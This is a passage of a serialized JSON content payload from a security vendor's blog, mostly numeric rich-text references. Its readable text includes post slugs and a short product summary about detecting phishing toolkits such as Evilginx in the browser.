8021],{"nodeType":173,"value":208668,"marks":238022,"data":238023},[],{},{"nodeType":178,"data":238025,"content":238026},{},[238027,238030,238037,238040,238047],{"nodeType":173,"value":208675,"marks":238028,"data":238029},[],{},{"nodeType":186,"data":238031,"content":238032},{"uri":208680},[238033],{"nodeType":173,"value":208683,"marks":238034,"data":238036},[238035],{"type":194},{},{"nodeType":173,"value":933,"marks":238038,"data":238039},[],{},{"nodeType":186,"data":238041,"content":238042},{"uri":832},[238043],{"nodeType":173,"value":835,"marks":238044,"data":238046},[238045],{"type":194},{},{"nodeType":173,"value":208698,"marks":238048,"data":238049},[],{},{"nodeType":178,"data":238051,"content":238052},{},[238053,238056,238063],{"nodeType":173,"value":208705,"marks":238054,"data":238055},[],{},{"nodeType":186,"data":238057,"content":238058},{"uri":208710},[238059],{"nodeType":173,"value":208713,"marks":238060,"data":238062},[238061],{"type":194},{},{"nodeType":173,"value":208718,"marks":238064,"data":238065},[],{},{"nodeType":178,"data":238067,"content":238068},{},[238069],{"nodeType":173,"value":208725,"marks":238070,"data":238071},[],{},{"nodeType":312,"data":238073,"content":238076},{"target":238074},{"sys":238075},{"id":169040,"type":317,"linkType":318},[],{"nodeType":169,"data":238078,"content":238079},{},[238080],{"nodeType":173,"value":208737,"marks":238081,"data":238082},[],{},{"nodeType":178,"data":238084,"content":238085},{},[238086],{"nodeType":173,"value":208744,"marks":238087,"data":238088},[],{},{"nodeType":178,"data":238090,"content":238091},{},[238092],{"nodeType":173,"value":208751,"marks":238093,"data":238094},[],{},{"nodeType":235,"data":238096,"content":238097},{},[238098],{"nodeType":173,"value":208758,"marks":238099,"data":238100},[],{},{"nodeType":178,"data":238102,"content":238103},{},[238104],{"nodeType":173,"value":208765,"marks":238105,"data":238106},[],{},{"nodeType":178,"data":238108,"content":238109},{},[238110],{"nodeType":173,"value":208772,"marks":238111,"data":238112},[],{},{"nodeType":178,"data":238114,"content":238115},{},[238116],{"nodeType":173,"value":208779,"marks":238117,"data":238118},[],{},{"nodeType":235,"data":238120,"content":238121},{},[238122],{"nodeType":173,"value":208786,"marks":238123,"data":238124},[],{},{"nodeType":178,"data":238126,"content":238127},{},[238128],{"nodeType":173,"value":208793,"marks":238129,"data":238130},[],{},{"nodeType":178,"data":238132,"content":238133},{},[238134],{"nodeType":173,"value":208800,"marks":238135,"data":238136},[],{},{"nodeType":178,"data":238138,"content":238139},{},[238140],{"nodeType":173,"value":208807,"marks":238141,"data":238142},[],{},{"nodeType":169,"data":238144,"content":238145},{},[238146],{"nodeType":173,"value":208814,"marks":238147,"data":238148},[],{},{"nodeType":178,"data":238150,"content":238151},{},[238152,238155,238159],{"nodeType":173,"value":208821,"marks":238153,"data":238154},[],{},{"nodeType":173,"value":208825,"marks":238156,"data":238158},[238157],{"type":1646},{},{"nodeType":173,"value":208830,"marks":238160,"data":238161},[],{},{"nodeType":235,"data":238163,"content":238164},{},[238165],{"nodeType":173,"value":208837,"marks":238166,"data":238167},[],{},{"nodeType":178,"data":238169,"content":238170},{},[238171,238174,238181,238184,238191,238194,238201,238204,238211,238214,238221],{"nodeType":173,"value":208844,"marks":238172,"data":238173},[],{},{"nodeType":186,"data":238175,"content":238176},{"uri":208849},[238177],{"nodeType":173,"value":208852,"marks":238178,"data":238180},[238179],{"type":194},{},{"nodeType":173,"value":933,"marks":238182,"data":238183},[],{},{"nodeType":186,"data":238185,"content":238186},{"uri":208861},[238187],{"nodeType":173,"value":208864,"marks":238188,"data":238190},[238189],{"type":194},{},{"nodeType":173,"value":208869,"marks":238192,"data":238193},[],{},{"nodeType":186,"data":238195,"content":238196},{"uri":208874},[238197],{"nodeType":173,"value":208877,"marks":238198,"data":238200},[238199],{"type":194},{},{"nodeType":173,"value":73790,"marks":238202,"data":238203},[],{},{"nodeType":186,"data":238205,"content":238206},{"uri":1297},[238207],{"nodeType":173,"value":208888,"marks":238208,"data":238210},[238209],{"type":194},{},{"nodeType":173,"value":208893,"marks":238212,"data":238213},[],{},{"nodeType":186,"data":238215,"content":238216},{"uri":208898},[238217],{"nodeType":173,"value":208901,"marks":238218,"data":238220},[238219],{"type":194},{},{"nodeType":173,"value":208906,"marks":238222,"data":238223},[],{},{"nodeType":178,"data":238225,"content":238226},{},[238227],{"nodeType":173,"value":208913,"marks":238228,"data":238229},[],{},{"nodeType":235,"data":238231,"content":238232},{},[238233],{"nodeType":173,"value":208920,"marks":238234,"data":238235},[],{},{"nodeType":178,"data":238237,"content":238238},{},[238239,238242,238246,238249,238256],{"nodeType":173,"value":208927,"marks":238240,"data":238241},[],{},{"nodeType":173,"value":208931,"marks":238243,"data":238245},[238244],{"type":194},{},{"nodeType":173,"value":208936,"marks":238247,"data":238248},[],{},{"nodeType":186,"data":238250,"content":238251},{"uri":208941},[238252],{"nodeType":173,"value":208944,"marks":238253,"data":238255},[238254],{"type":194},{},{"nodeType":173,"value":208949,"marks":238257,"data":238258},[],{},{"nodeType":178,"data":238260,"content":238261},{},[238262,238265,238269],{"nodeType":173,"value":208956,"marks":238263,"data":238264},[],{},{"nodeType":173,"value":208960,"marks":238266,"data":238268},[238267],{"type":1646},{},{"nodeType":173,"value":1477,"marks":238270,"data":238271},[],{},{"nodeType":178,"data":238273,"content":238274},{},[238275],{"nodeType":173,"value":208971,"marks":238276,"data":238277},[],{},{"nodeType":235,"data":238279,"content":238280},{},[238281],{"nodeType":173,"value":208978,"marks":238282,"data":238283},[],{},{"nodeType":178,"data":238285,"content":238286},{},[238287],{"nodeType":173,"value":208985,"marks":238288,"data":238289},[],{},{"nodeType":178,"data":238291,"content":238292},{},[238293,238296,238303,238306,238313],{"nodeType":173,"value":208992,"marks":238294,"data":238295},[],{},{"nodeType":186,"data":238297,"content":238298},{"uri":208997},[238299],{"nodeType":173,"value":209000,"marks":238300,"data":238302},[238301],{"type":194},{},{"nodeType":173,"value":209005,"marks":238304,"data":238305},[],{},{"nodeType":186,"data":238307,"content":238308},{"uri":209010},[238309],{"nodeType":173,"value":209013,"marks":238310,"data":238312},[238311],{"type":194},{},{"nodeType":173,"value":209018,"marks":238314,"data":238315},[],{},{"nodeType":178,"data":238317,"content":238318},{},[238319,238322,238330],{"nodeType":173,"value":209025,"marks":238320,"data":238321},[],{},{"nodeType":186,"data":238323,"content":238324},{"uri":209030},[238325],{"nodeType":173,"value":209033,"marks":238326,"data":238329},[238327,238328],{"type":194},{"type":1646},{},{"nodeType":173,"value":37,"marks":238331,"data":238332},[],{},{"nodeType":178,"data":238334,"content":238335},{},[238336],{"nodeType":173,"value":209045,"marks":238337,"data":238338},[],{},{"nodeType":169,"data":238340,"content":238341},{},[238342],{"nodeType":173,"value":209052,"marks":238343,"data":238344},[],{},{"nodeType":178,"data":238346,"content":238347},{},[238348],{"nodeType":173,"value":209059,"marks":238349,"data":238350},[],{},{"nodeType":178,"data":238352,"content":238353},{},[238354],{"nodeType":173,"value":209066,"marks":238355,"data":238356},[],{},{"nodeType":178,"data":238358,"content":238359},{},[238360,238363,238370],{"nodeType":173,"value":209073,"marks":238361,"data":238362},[],{},{"nodeType":186,"data":238364,"content":238365},{"uri":209078},[238366],{"nodeType":173,"value":209081,"marks":238367,"data":238369},[238368],{"type":194},{},{"nodeType":173,"value":1477,"marks":238371,"data":238372},[],{},{"nodeType":178,"data":238374,"content":238375},{},[238376,238379,238386],{"nodeType":173,"value":209092,"marks":238377,"data":238378},[],{},{"nodeType":186,"data":238380,"content":238381},{"uri":88239},[238382],{"nodeType":173,"value":197982,"marks":238383,"data":238385},[238384],{"type":194},{},{"nodeType":173,"value":197986,"marks":238387,"data":238388},[],{},{"nodeType":312,"data":238390,"content":238393},{"target":238391},{"sys":238392},{"id":209109,"type":317,"linkType":318},[],{"nodeType":178,"data":238395,"content":238396},{},[238397],{"nodeType":173,"value":37,"marks":238398,"data":238399},[],{},{"items":238401},[238402,238404],{"sys":238403,"name":505},{"id":504},{"sys":238405,"name":509},{"id":508},{"items":238407},[238408],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":238409},{"url":13981},{"items":238411},[238412],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":238413},{"url":1496},{"json":238415,"links":238824},{"nodeType":165,"data":238416,"content":238417},{},[238418,238424,238430,238436,238442,238448,238454,238460,238466,238472,238488,238504,238510,238516,238532,238538,238548,238585,238591,238607,238614,238620,238626,238632,238638,238644,238702,238708,238713,238719,238725,238731,238737,238753,238759,238765,238771,238777,238783,238789,238795,238801,238807,238812,238818],{"nodeType":178,"data":238419,"content":238420},{},[238421],{"nodeType":173,"value":217367,"marks":238422,"data":238423},[],{},{"nodeType":178,"data":238425,"content":238426},{},[238427],{"nodeType":173,"value":217374,"marks":238428,"data":238429},[],{},{"nodeType":178,"data":238431,"content":238432},{},[238433],{"nodeType":173,"value":217381,"marks":238434,"data":238435},[],{},{"nodeType":178,"data":238437,"content":238438},{},[238439],{"nodeType":173,"value":217388,"marks":238440,"data":238441},[],{},{"nodeType":178,"data":238443,"content":238444},{},[238445],{"nodeType":173,"value":217395,"marks":238446,"data":238447},[],{},{"nodeType":169,"data":238449,"content":238450},{},[238451],{"nodeType":173,"value":217402,"marks":238452,"data":238453},[],{},{"nodeType":178,"data":238455,"content":238456},{},[238457],{"nodeType":173,"value":217409,"marks":238458,"data":238459},[],{},{"nodeType":178,"data":238461,"content":238462},{},[238463],{"nodeType":173,"value":217416,"marks":238464,"data":238465},[],{},{"nodeType":178,"data":238467,"content":238468},{},[238469],{"nodeType":173,"value":217423,"marks":238470,"data":238471},[],{},{"nodeType":250,"data":238473,"content":238474},{},[238475],{"nodeType":254,"data":238476,"content":238477},{},[238478],{"nodeType":178,"data":238479,"content":238480},{},[238481,238485],{"nodeType":173,"value":217436,"marks":238482,"data":238484},[238483],{"type":370},{},{"nodeType":173,"value":217441,"marks":238486,"data":238487},[],{},{"nodeType":250,"data":238489,"content":238490},{},[238491],{"nodeType":254,"data":238492,"content":238493},{},[238494],{"nodeType":178,"data":238495,"content":238496},{},[238497,238501],{"nodeType":173,"value":217454,"marks":238498,"data":238500},[238499],{"type":370},{},{"nodeType":173,"value":217459,"marks":238502,"data":238503},[],{},{"nodeType":235,"data":238505,"content":238506},{},[238507],{"nodeType":173,"value":217466,"marks":238508,"data":238509},[],{},{"nodeType":178,"data":238511,"content":238512},{},[238513],{"nodeType":173,"value":217473,"marks":238514,"data":238515},[],{},{"nodeType":178,"data":238517,"content":238518},{},[238519,238522,238529],{"nodeType":173,"value":217480,"marks":238520,"data":238521},[],{},{"nodeType":186,"data":238523,"content":238524},{"uri":217485},[238525],{"nodeType":173,"value":217488,"marks":238526,"data":238528},[238527],{"type":194},{},{"nodeType":173,"value":217493,"marks":238530,"data":238531},[],{},{"nodeType":178,"data":238533,"content":238534},{},[238535],{"nodeType":173,"value":217500,"marks":238536,"data":238537},[],{},{"nodeType":178,"data":238539,"content":238540},{},[238541,238544],{"nodeType":173,"value":217507,"marks":238542,"data":238543},[],{},{"nodeType":173,"value":217511,"marks":238545,"data":238547},[238546],{"type":370},{},{"nodeType":250,"data":238549,"content":238550},{},[238551,238568],{"nodeType":254,"data":238552,"content":238553},{},[238554],{"nodeType":178,"data":238555,"content":238556},{},[238557,238561,238564],{"nodeType":173,"value":217525,"marks":238558,"data":238560},[238559],{"type":370},{},{"nodeType":173,"value":217530,"marks":238562,"data":238563},[],{},{"nodeType":173,"value":217534,"marks":238565,"data":238567},[238566],{"type":1646},{},{"nodeType":254,"data":238569,"content":238570},{},[238571],{"nodeType":178,"data":238572,"content":238573},{},[238574,238578,238581],{"nodeType":173,"value":217545,"marks":238575,"data":238577},[238576],{"type":370},{},{"nodeType":173,"value":217550,"marks":238579,"data":238580},[],{},{"nodeType":173,"value":217554,"marks":238582,"data":238584},[238583],{"type":370},{},{"nodeType":178,"data":238586,"content":238587},{},[238588],{"nodeType":173,"value":217562,"marks":238589,"data":238590},[],{},{"nodeType":178,"data":238592,"content":238593},{},[238594,238598,238603],{"nodeType":173,"value":217569,"marks":238595,"data":238597},[238596],{"type":370},{},{"nodeType":173,"value":217574,"marks":238599,"data":238602},[238600,238601],{"type":1646},{"type":370},{},{"nodeType":173,"value":217580,"marks":238604,"data":238606},[238605],{"type":370},{},{"nodeType":169,"data":238608,"content":238609},{},[238610],{"nodeType":173,"value":217588,"marks":238611,"data":238613},[238612],{"type":370},{},{"nodeType":178,"data":238615,"content":238616},{},[238617],{"nodeType":173,"value":217596,"marks":238618,"data":238619},[],{},{"nodeType":178,"data":238621,"content":238622},{},[238623],{"nodeType":173,"value":217603,"marks":238624,"data":238625},[],{},{"nodeType":178,"data":238627,"content":238628},{},[238629],{"nodeType":173,"value":217610,"marks":238630,"data":238631},[],{},{"nodeType":178,"data":238633,"content":238634},{},[238635],{"nodeType":173,"value":217617,"marks":238636,"data":238637},[],{},{"nodeType":178,"data":238639,"content":238640},{},[238641],{"nodeType":173,"value":217624,"marks":238642,"data":238643},[],{},{"nodeType":250,"data":238645,"content":238646},{},[238647,238666,238684],{"nodeType":254,"data":238648,"content":238649},{},[238650],{"nodeType":178,"data":238651,"content":238652},{},[238653,238656,238663],{"nodeType":173,"value":37,"marks":238654,"data":238655},[],{},{"nodeType":186,"data":238657,"content":238658},{"uri":9099},[238659],{"nodeType":173,"value":217643,"marks":238660,"data":238662},[238661],{"type":194},{},{"nodeType":173,"value":217648,"marks":238664,"data":238665},[],{},{"nodeType":254,"data":238667,"content":238668},{},[238669],{"nodeType":178,"data":238670,"content":238671},{},[238672,238675,238681],{"nodeType":173,"value":37,"marks":238673,"data":238674},[],{},{"nodeType":186,"data":238676,"content":238677},{"uri":75048},[238678],{"nodeType":173,"value":217664,"marks":238679,"data":238680},[],{},{"nodeType":173,"value":217668,"marks":238682,"data":238683},[],{},{"nodeType":254,"data":238685,"content":238686},{},[238687],{"nodeType":178,"data":238688,"content":238689},{},[238690,238693,238699],{"nodeType":173,"value":37,"marks":238691,"data":238692},[],{},{"nodeType":186,"data":238694,"content":238695},{"uri":217682},[238696],{"nodeType":173,"value":217685,"marks":238697,"data":238698},[],{},{"nodeType":173,"value":217689,"marks":238700,"data":238701},[],{},{"nodeType":178,"data":238703,"content":238704},{},[238705],{"nodeType":173,"value":217696,"marks":238706,"data":238707},[],{},{"nodeType":312,"data":238709,"content":238712},{"target":238710},{"sys":238711},{"id":75120,"type":317,"linkType":318},[],{"nodeType":178,"data":238714,"content":238715},{},[238716],{"nodeType":173,"value":217708,"marks":238717,"data":238718},[],{},{"nodeType":169,"data":238720,"content":238721},{},[238722],{"nodeType":173,"value":217715,"marks":238723,"data":238724},[],{},{"nodeType":178,"data":238726,"content":238727},{},[238728],{"nodeType":173,"value":217722,"marks":238729,"data":238730},[],{},{"nodeType":235,"data":238732,"content":238733},{},[238734],{"nodeType":173,"value":217729,"marks":238735,"data":238736},[],{},{"nodeType":178,"data":238738,"content":238739},{},[238740,238743,238750],{"nodeType":173,"value":217736,"marks":238741,"data":238742},[],{},{"nodeType":186,"data":238744,"content":238745},{"uri":115077},[238746],{"nodeType":173,"value":217743,"marks":238747,"data":238749},[238748],{"type":194},{},{"nodeType":173,"value":217748,"marks":238751,"data":238752},[],{},{"nodeType":178,"data":238754,"content":238755},{},[238756],{"nodeType":173,"value":217755,"marks":238757,"data":238758},[],{},{"nodeType":178,"data":238760,"content":238761},{},[238762],{"nodeType":173,"value":217762,"marks":238763,"data":238764},[],{},{"nodeType":178,"data":238766,"content":238767},{},[238768],{"nodeType":173,"value":217769,"marks":238769,"data":238770},[],{},{"nodeType":235,"data":238772,"content":238773},{},[238774],{"nodeType":173,"value":217776,"marks":238775,"data":238776},[],{},{"nodeType":178,"data":238778,"content":238779},{},[238780],{"nodeType":173,"value":217783,"marks":238781,"data":238782},[],{},{"nodeType":178,"data":238784,"content":238785},{},[238786],{"nodeType":173,"value":217790,"marks":238787,"data":238788},[],{},{"nodeType":235,"data":238790,"content":238791},{},[238792],{"nodeType":173,"value":217797,"marks":238793,"data":238794},[],{},{"nodeType":178,"data":238796,"content":238797},{},[238798],{"nodeType":173,"value":217804,"marks":238799,"data":238800},[],{},{"nodeType":178,"data":238802,"content":238803},{},[238804],{"nodeType":173,"value":217811,"marks":238805,"data":238806},[],{},{"nodeType":312,"data":238808,"content":238811},{"target":238809},{"sys":238810},{"id":217818,"type":317,"linkType":318},[],{"nodeType":169,"data":238813,"content":238814},{},[238815],{"nodeType":173,"value":40632,"marks":238816,"data":238817},[],{},{"nodeType":178,"data":238819,"content":238820},{},[238821],{"nodeType":173,"value":217830,"marks":238822,"data":238823},[],{},{"entries":238825},{"hyperlink":238826,"inline":238827,"block":238828},[],[],[238829,238832],{"sys":238830,"__typename":5345,"title":213483,"caption":213484,"layoutMode":118,"file":238831},{"id":75120},{"url":212907,"width":213486,"height":213487},{"sys":238833,"__typename":5345,"title":226778,"caption":226779,"layoutMode":118,"file":238834},{"id":217818},{"url":226781,"width":226782,"height":226783},"content:blog:the-web-proxy-is-dead-long-live-the-browser-extension.json","blog/the-web-proxy-is-dead-long-live-the-browser-extension.json","blog/the-web-proxy-is-dead-long-live-the-browser-extension",{"_path":238839,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":238840,"ogImage":118,"summary":238842,"title":202530,"subtitle":118,"metaTitle":238853,"synopsis":202531,"hashTags":118,"publishedDate":202532,"slug":202533,"tagsCollection":238854,"authorsCollection":238860,"content":238864,"relatedBlogPostsCollection":239252,"_id":240841,"_type":5439,"_source":5440,"_file":240842,"_stem":240843,"_extension":5439},"/blog/introducing-aitm-phishing-toolkit-detection-powered-by-the-push-browser",{"id":114387,"publishedAt":238841},"2026-01-30T09:23:05.343Z",{"json":238843},{"data":238844,"content":238845,"nodeType":165},{},[238846],{"data":238847,"content":238848,"nodeType":178},{},[238849],{"data":238850,"marks":238851,"value":238852,"nodeType":173},{},[],"Push analyzes behavioral attributes of malware to identify advanced phishing tools like Evilginx and NakedPages in use on websites and immediately block end-users from visiting them.","Detect and block phishing tools with the Push browser agent",{"items":238855},[238856,238858],{"sys":238857,"name":18399},{"id":18398},{"sys":238859,"name":509},{"id":508},{"items":238861},[238862],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":238863},{"url":2911},{"json":238865,"links":239216},{"nodeType":165,"data":238866,"content":238867},{},[238868,238873,238890,238907,238922,238939,238960,238966,238983,239000,239006,239011,239017,239023,239029,239035,239041,239047,239053,239059,239065,239082,239088,239093,239113,239119,239134,239139,239156,239162,239168,239174,239180,239195,239201],{"nodeType":312,"data":238869,"content":238872},{"target":238870},{"sys":238871},{"id":202136,"type":317,"linkType":318},[],{"nodeType":178,"data":238874,"content":238875},{},[238876,238879,238887],{"nodeType":173,"value":202142,"marks":238877,"data":238878},[],{},{"nodeType":1698,"data":238880,"content":238883},{"target":238881},{"sys":238882},{"id":202149,"type":317,"linkType":318},[238884],{"nodeType":173,"value":202152,"marks":238885,"data":238886},[],{},{"nodeType":173,"value":202156,"marks":238888,"data":238889},[],{},{"nodeType":178,"data":238891,"content":238892},{},[238893,238896,238904],{"nodeType":173,"value":202163,"marks":238894,"data":238895},[],{},{"nodeType":1698,"data":238897,"content":238900},{"target":238898},{"sys":238899},{"id":202170,"type":317,"linkType":318},[238901],{"nodeType":173,"value":202173,"marks":238902,"data":238903},[],{},{"nodeType":173,"value":202177,"marks":238905,"data":238906},[],{},{"nodeType":178,"data":238908,"content":238909},{},[238910,238913,238919],{"nodeType":173,"value":202184,"marks":238911,"data":238912},[],{},{"nodeType":186,"data":238914,"content":238915},{"uri":183364},[238916],{"nodeType":173,"value":202191,"marks":238917,"data":238918},[],{},{"nodeType":173,"value":202195,"marks":238920,"data":238921},[],{},{"nodeType":178,"data":238923,"content":238924},{},[238925,238928,238936],{"nodeType":173,"value":202202,"marks":238926,"data":238927},[],{},{"nodeType":1698,"data":238929,"content":238932},{"target":238930},{"sys":238931},{"id":202149,"type":317,"linkType":318},[238933],{"nodeType":173,"value":202211,"marks":238934,"data":238935},[],{},{"nodeType":173,"value":202215,"marks":238937,"data":238938},[],{},{"nodeType":250,"data":238940,"content":238941},{},[238942,238951],{"nodeType":254,"data":238943,"content":238944},{},[238945],{"nodeType":178,"data":238946,"content":238947},{},[238948],{"nodeType":173,"value":202228,"marks":238949,"data":238950},[],{},{"nodeType":254,"data":238952,"content":238953},{},[238954],{"nodeType":178,"data":238955,"content":238956},{},[238957],{"nodeType":173,"value":202238,"marks":238958,"data":238959},[],{},{"nodeType":178,"data":238961,"content":238962},{},[238963],{"nodeType":173,"value":202245,"marks":238964,"data":238965},[],{},{"nodeType":178,"data":238967,"content":238968},{},[238969,238972,238980],{"nodeType":173,"value":202252,"marks":238970,"data":238971},[],{},{"nodeType":1698,"data":238973,"content":238976},{"target":238974},{"sys":238975},{"id":2148,"type":317,"linkType":318},[238977],{"nodeType":173,"value":202261,"marks":238978,"data":238979},[],{},{"nodeType":173,"value":202265,"marks":238981,"data":238982},[],{},{"nodeType":178,"data":238984,"content":238985},{},[238986,238989,238997],{"nodeType":173,"value":202272,"marks":238987,"data":238988},[],{},{"nodeType":1698,"data":238990,"content":238993},{"target":238991},{"sys":238992},{"id":189461,"type":317,"linkType":318},[238994],{"nodeType":173,"value":202281,"marks":238995,"data":238996},[],{},{"nodeType":173,"value":202285,"marks":238998,"data":238999},[],{},{"nodeType":178,"data":239001,"content":239002},{},[239003],{"nodeType":173,"value":202292,"marks":239004,"data":239005},[],{},{"nodeType":312,"data":239007,"content":239010},{"target":239008},{"sys":239009},{"id":202299,"type":317,"linkType":318},[],{"nodeType":169,"data":239012,"content":239013},{},[239014],{"nodeType":173,"value":202305,"marks":239015,"data":239016},[],{},{"nodeType":178,"data":239018,"content":239019},{},[239020],{"nodeType":173,"value":202312,"marks":239021,"data":239022},[],{},{"nodeType":178,"data":239024,"content":239025},{},[239026],{"nodeType":173,"value":202319,"marks":239027,"data":239028},[],{},{"nodeType":178,"data":239030,"content":239031},{},[239032],{"nodeType":173,"value":202326,"marks":239033,"data":239034},[],{},{"nodeType":178,"data":239036,"content":239037},{},[239038],{"nodeType":173,"value":202333,"marks":239039,"data":239040},[],{},{"nodeType":178,"data":239042,"content":239043},{},[239044],{"nodeType":173,"value":202340,"marks":239045,"data":239046},[],{},{"nodeType":178,"data":239048,"content":239049},{},[239050],{"nodeType":173,"value":202347,"marks":239051,"data":239052},[],{},{"nodeType":169,"data":239054,"content":239055},{},[239056],{"nodeType":173,"value":189115,"marks":239057,"data":239058},[],{},{"nodeType":178,"data":239060,"content":239061},{},[239062],{"nodeType":173,"value":202360,"marks":239063,"data":239064},[],{},{"nodeType":178,"data":239066,"content":239067},{},[239068,239071,239079],{"nodeType":173,"value":202367,"marks":239069,"data":239070},[],{},{"nodeType":1698,"data":239072,"content":239075},{"target":239073},{"sys":239074},{"id":183439,"type":317,"linkType":318},[239076],{"nodeType":173,"value":155418,"marks":239077,"data":239078},[],{},{"nodeType":173,"value":202379,"marks":239080,"data":239081},[],{},{"nodeType":178,"data":239083,"content":239084},{},[239085],{"nodeType":173,"value":202386,"marks":239086,"data":239087},[],{},{"nodeType":312,"data":239089,"content":239092},{"target":239090},{"sys":239091},{"id":189099,"type":317,"linkType":318},[],{"nodeType":178,"data":239094,"content":239095},{},[239096,239099,239103,239106,239110],{"nodeType":173,"value":180786,"marks":239097,"data":239098},[],{},{"nodeType":173,"value":2748,"marks":239100,"data":239102},[239101],{"type":370},{},{"nodeType":173,"value":202405,"marks":239104,"data":239105},[],{},{"nodeType":173,"value":2740,"marks":239107,"data":239109},[239108],{"type":370},{},{"nodeType":173,"value":202413,"marks":239111,"data":239112},[],{},{"nodeType":178,"data":239114,"content":239115},{},[239116],{"nodeType":173,"value":202420,"marks":239117,"data":239118},[],{},{"nodeType":178,"data":239120,"content":239121},{},[239122,239125,239131],{"nodeType":173,"value":196274,"marks":239123,"data":239124},[],{},{"nodeType":186,"data":239126,"content":239127},{"uri":183466},[239128],{"nodeType":173,"value":155030,"marks":239129,"data":239130},[],{},{"nodeType":173,"value":196284,"marks":239132,"data":239133},[],{},{"nodeType":312,"data":239135,"content":239138},{"target":239136},{"sys":239137},{"id":202442,"type":317,"linkType":318},[],{"nodeType":178,"data":239140,"content":239141},{},[239142,239145,239153],{"nodeType":173,"value":202448,"marks":239143,"data":239144},[],{},{"nodeType":1698,"data":239146,"content":239149},{"target":239147},{"sys":239148},{"id":2405,"type":317,"linkType":318},[239150],{"nodeType":173,"value":125683,"marks":239151,"data":239152},[],{},{"nodeType":173,"value":202460,"marks":239154,"data":239155},[],{},{"nodeType":178,"data":239157,"content":239158},{},[239159],{"nodeType":173,"value":202467,"marks":239160,"data":239161},[],{},{"nodeType":178,"data":239163,"content":239164},{},[239165],{"nodeType":173,"value":202474,"marks":239166,"data":239167},[],{},{"nodeType":169,"data":239169,"content":239170},{},[239171],{"nodeType":173,"value":117844,"marks":239172,"data":239173},[],{},{"nodeType":178,"data":239175,"content":239176},{},[239177],{"nodeType":173,"value":202487,"marks":239178,"data":239179},[],{},{"nodeType":178,"data":239181,"content":239182},{},[239183,239186,239192],{"nodeType":173,"value":202494,"marks":239184,"data":239185},[],{},{"nodeType":186,"data":239187,"content":239188},{"uri":202499},[239189],{"nodeType":173,"value":202502,"marks":239190,"data":239191},[],{},{"nodeType":173,"value":1477,"marks":239193,"data":239194},[],{},{"nodeType":169,"data":239196,"content":239197},{},[239198],{"nodeType":173,"value":71801,"marks":239199,"data":239200},[],{},{"nodeType":178,"data":239202,"content":239203},{},[239204,239207,239213],{"nodeType":173,"value":114452,"marks":239205,"data":239206},[],{},{"nodeType":186,"data":239208,"content":239209},{"uri":473},[239210],{"nodeType":173,"value":88194,"marks":239211,"data":239212},[],{},{"nodeType":173,"value":202527,"marks":239214,"data":239215},[],{},{"entries":239217},{"inline":239218,"hyperlink":239219,"block":239232},[],[239220,239222,239224,239226,239228,239230],{"sys":239221,"__typename":1528,"title":140020,"slug":230550},{"id":202149},{"sys":239223,"__typename":1528,"title":223970,"slug":223973},{"id":202170},{"sys":239225,"__typename":6655,"title":6656,"slug":6657,"articleId":6658},{"id":2148},{"sys":239227,"__typename":1528,"title":236248,"slug":236251},{"id":189461},{"sys":239229,"__typename":66743,"linkedFromParent":118,"title":231670,"slug":231671,"audience":66746},{"id":183439},{"sys":239231,"__typename":6655,"title":6676,"slug":6677,"articleId":6678},{"id":2405},[239233,239240,239243,239246],{"sys":239234,"__typename":127689,"title":239235,"youTubeUrl":239236,"imagePlaceholder":239237},{"id":202136},"Introducing phishing toolkit detection with Push: Detect AitM and BitM toolkits","https://www.youtube.com/watch?v=em8H0VOezqM",{"url":239238,"width":29269,"height":239239},"https://images.ctfassets.net/y1cdw1ablpvd/44uW8syU7RcxSx5kI2y0yO/469cb925808f74196b57b6ae209888de/Screenshot_2024-08-15_at_07.11.23.png",1898,{"sys":239241,"__typename":15269,"type":15270,"ctaText":239242,"buttonLabel":142998,"buttonColour":72847,"buttonUrl":196248},{"id":202299},"Learn more about AitM phishing toolkits in our on-demand webinar",{"sys":239244,"__typename":5345,"title":220985,"caption":220986,"layoutMode":118,"file":239245},{"id":189099},{"url":220988,"width":23880,"height":19654},{"sys":239247,"__typename":5345,"title":239248,"caption":118,"layoutMode":118,"file":239249},{"id":202442},"Evilginx and EvilnoVNC",{"url":239250,"width":239251,"height":46375},"https://images.ctfassets.net/y1cdw1ablpvd/5x785N81GKYzByJoSNIYE0/12da45107348238316b9c5d6350b9d05/Image1__4_-min.png",1336,{"items":239253},[239254,239980,240367],{"__typename":1528,"sys":239255,"content":239256,"title":140020,"synopsis":230548,"hashTags":118,"publishedDate":230549,"slug":230550,"tagsCollection":239970,"authorsCollection":239976},{"id":202149},{"json":239257},{"nodeType":165,"data":239258,"content":239259},{},[239260,239266,239272,239278,239284,239290,239296,239302,239308,239314,239319,239325,239331,239337,239383,239389,239395,239411,239417,239423,239429,239455,239468,239474,239480,239486,239492,239498,239504,239520,239536,239634,239640,239656,239662,239668,239674,239679,239685,239691,239697,239723,239729,239735,239765,239771,239777,239859,239874,239880,239886,239892,239898,239944,239950,239953,239959,239964],{"nodeType":178,"data":239261,"content":239262},{},[239263],{"nodeType":173,"value":229742,"marks":239264,"data":239265},[],{},{"nodeType":178,"data":239267,"content":239268},{},[239269],{"nodeType":173,"value":229749,"marks":239270,"data":239271},[],{},{"nodeType":178,"data":239273,"content":239274},{},[239275],{"nodeType":173,"value":229756,"marks":239276,"data":239277},[],{},{"nodeType":169,"data":239279,"content":239280},{},[239281],{"nodeType":173,"value":229763,"marks":239282,"data":239283},[],{},{"nodeType":178,"data":239285,"content":239286},{},[239287],{"nodeType":173,"value":229770,"marks":239288,"data":239289},[],{},{"nodeType":178,"data":239291,"content":239292},{},[239293],{"nodeType":173,"value":229777,"marks":239294,"data":239295},[],{},{"nodeType":178,"data":239297,"content":239298},{},[239299],{"nodeType":173,"value":229784,"marks":239300,"data":239301},[],{},{"nodeType":178,"data":239303,"content":239304},{},[239305],{"nodeType":173,"value":229791,"marks":239306,"data":239307},[],{},{"nodeType":178,"data":239309,"content":239310},{},[239311],{"nodeType":173,"value":229798,"marks":239312,"data":239313},[],{},{"nodeType":312,"data":239315,"content":239318},{"target":239316},{"sys":239317},{"id":229805,"type":317,"linkType":318},[],{"nodeType":235,"data":239320,"content":239321},{},[239322],{"nodeType":173,"value":229811,"marks":239323,"data":239324},[],{},{"nodeType":178,"data":239326,"content":239327},{},[239328],{"nodeType":173,"value":229818,"marks":239329,"data":239330},[],{},{"nodeType":178,"data":239332,"content":239333},{},[239334],{"nodeType":173,"value":229825,"marks":239335,"data":239336},[],{},{"nodeType":178,"data":239338,"content":239339},{},[239340,239343,239350,239353,239360,